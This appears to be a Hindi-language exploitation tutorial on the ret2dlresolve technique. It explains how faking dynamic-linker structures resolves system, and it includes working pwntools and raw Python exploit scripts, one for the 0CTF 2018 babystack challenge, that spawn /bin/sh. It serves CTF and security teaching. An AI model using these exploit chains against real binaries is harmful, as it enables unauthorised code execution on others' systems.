GOT/PLT और Relro के पेज में समझाया गया है कि पूर्ण Relro के बिनरी सिम्बल्स (जैसे बाहरी पुस्तकालयों के पतों) को पहली बार उन्हें उपयोग किया जाता है जब वे निर्धारित किए जाते हैं। यह समाधान _dl_runtime_resolve फ़ंक्शन को बुलाकर होता है।
_dl_runtime_resolve फ़ंक्शन स्टैक से कुछ संरचनाओं को लेता है जिनकी आवश्यकता होती है निर्धारित सिम्बल को सुलझाने के लिए।
इसलिए, यह संभव है कि सभी इन संरचनाओं को फेक किया जाए ताकि डायनामिक लिंक किए गए निर्दिष्ट सिम्बल (जैसे system फ़ंक्शन) को सुलझाए और इसे एक विन्यासित पैरामीटर (उदाहरण के लिए system('/bin/sh')) के साथ बुलाया जा सके।
सामान्यत: यह सभी संरचनाएँ एक पहली ROP श्रृंखला बनाकर read को बुलाने के लिए एक लिखने योग्य मेमोरी पर कॉल किया जाता है, फिर संरचनाएँ और स्ट्रिंग '/bin/sh' पास किए जाते हैं ताकि वे रीड द्वारा एक ज्ञात स्थान में संग्रहित हों, और फिर ROP श्रृंखला _dl_runtime_resolve को बुलाने के द्वारा जारी रखती है, इसे फेक संरचनाओं में system का पता सुलझाने और इस पते को उपयोग करके बुलाने के लिए बुलाती है $'/bin/sh'।
यह तकनीक विशेष रूप से उपयोगी है यदि syscall गैजेट्स नहीं हैं (तकनीकों का उपयोग करने के लिए जैसे ret2syscall या SROP) और libc पतों को लीक करने के तरीके नहीं हैं।
इस तकनीक के बारे में एक अच्छी समझ के लिए इस वीडियो को देखें जिसमें तकनीक का दूसरे हाफ में अच्छी समझ दी गई है:
या इन पेजों की जाँच करें एक कदम-दर-कदम समझाने के लिए:
context.binary = elf =ELF(pwnlib.data.elf.ret2dlresolve.get('amd64'))>>> rop =ROP(elf)>>> dlresolve =Ret2dlresolvePayload(elf, symbol="system", args=["echo pwned"])>>> rop.read(0, dlresolve.data_addr)# do not forget this step, but use whatever function you like>>> rop.ret2dlresolve(dlresolve)>>> raw_rop = rop.chain()>>>print(rop.dump())0x0000:0x400593 pop rdi; ret0x0008:0x0 [arg0] rdi =00x0010:0x400591 pop rsi; pop r15; ret0x0018:0x601e00 [arg1] rsi =62991360x0020:b'iaaajaaa'<pad r15>0x0028:0x4003f0 read0x0030:0x400593 pop rdi; ret0x0038:0x601e48 [arg0] rdi =62992080x0040:0x4003e0 [plt_init] system0x0048:0x15670 [dlresolve index]
उदाहरण
केवल Pwntools
आप इस तकनीक का एक उदाहारण यहाँ पा सकते हैं जिसमें अंतिम ROP श्रृंखला की बहुत अच्छी व्याख्या है, लेकिन यहाँ उपयोग किया गया अंतिम उत्पीड़न है:
from pwn import*elf = context.binary =ELF('./vuln', checksec=False)p = elf.process()rop =ROP(elf)# create the dlresolve objectdlresolve =Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])rop.raw('A'*76)rop.read(0, dlresolve.data_addr)# read to where we want to write the fake structuresrop.ret2dlresolve(dlresolve)# call .plt and dl-resolve() with the correct, calculated reloc_offsetlog.info(rop.dump())p.sendline(rop.chain())p.sendline(dlresolve.payload)# now the read is called and we pass all the relevant structures inp.interactive()
कच्चा
# Code from https://guyinatuxedo.github.io/18-ret2_csu_dl/0ctf18_babystack/index.html# This exploit is based off of: https://github.com/sajjadium/ctf-writeups/tree/master/0CTFQuals/2018/babystackfrom pwn import*target =process('./babystack')#gdb.attach(target)elf =ELF('babystack')# Establish starts of various sectionsbss =0x804a020dynstr =0x804822cdynsym =0x80481ccrelplt =0x80482b0# Establish two functionsscanInput =p32(0x804843b)resolve =p32(0x80482f0)#dlresolve address# Establish size of second payloadpayload1_size =43# Our first scan# This will call read to scan in our fake entries into the plt# Then return back to scanInput to re-exploit the bugpayload0 =""payload0 +="0"*44# Filler from start of input to return addresspayload0 +=p32(elf.symbols['read'])# Return readpayload0 += scanInput # After the read call, return to scan inputpayload0 +=p32(0)# Read via stdinpayload0 +=p32(bss)# Scan into the start of the bsspayload0 +=p32(payload1_size)# How much data to scan intarget.send(payload0)# Our second scan# This will be scanned into the start of the bss# It will contain the fake entries for our ret_2_dl_resolve attack# Calculate the r_info value# It will provide an index to our dynsym entrydynsym_offset = ((bss +0xc) - dynsym) /0x10r_info = (dynsym_offset <<8) |0x7# Calculate the offset from the start of dynstr section to our dynstr entrydynstr_index = (bss +28) - dynstrpaylaod1 =""# Our .rel.plt entrypaylaod1 +=p32(elf.got['alarm'])paylaod1 +=p32(r_info)# Emptypaylaod1 +=p32(0x0)# Our dynsm entrypaylaod1 +=p32(dynstr_index)paylaod1 +=p32(0xde)*3# Our dynstr entrypaylaod1 +="system\x00"# Store "/bin/sh" here so we can have a pointer ot itpaylaod1 +="/bin/sh\x00"target.send(paylaod1)# Our third scan, which will execute the ret_2_dl_resolve# This will just call 0x80482f0, which is responsible for calling the functions for resolving# We will pass it the `.rel.plt` index for our fake entry# As well as the arguments for system# Calculate address of "/bin/sh"binsh_bss_address = bss +35# Calculate the .rel.plt offsetret_plt_offset = bss - relpltpaylaod2 =""paylaod2 +="0"*44paylaod2 += resolve # 0x80482f0paylaod2 +=p32(ret_plt_offset)# .rel.plt offsetpaylaod2 +=p32(0xdeadbeef)# The next return address after 0x80482f0, really doesn't matter for uspaylaod2 +=p32(binsh_bss_address)# Our argument, address of "/bin/sh"target.send(paylaod2)# Enjoy the shell!target.interactive()
32बिट, कोई relro नहीं, कोई कैनेरी नहीं, nx, कोई pie नहीं, मूल स्मॉल बफर ओवरफ्लो और रिटर्न। इसे एक्सप्लॉइट करने के लिए bof का उपयोग किया जाता है ताकि एक बार फिर read को एक .bss खंड के साथ और एक बड़े साइज में बुलाया जा सके, जिसमें dlresolve फेक तालिकाएँ होती हैं ताकि system लोड हो सके, मुख्य में वापस लौटें और प्रारंभिक bof को फिर से दुरुपयोग करने के लिए dlresolve को बुलाने और फिर system('/bin/sh') को कॉल करने के लिए।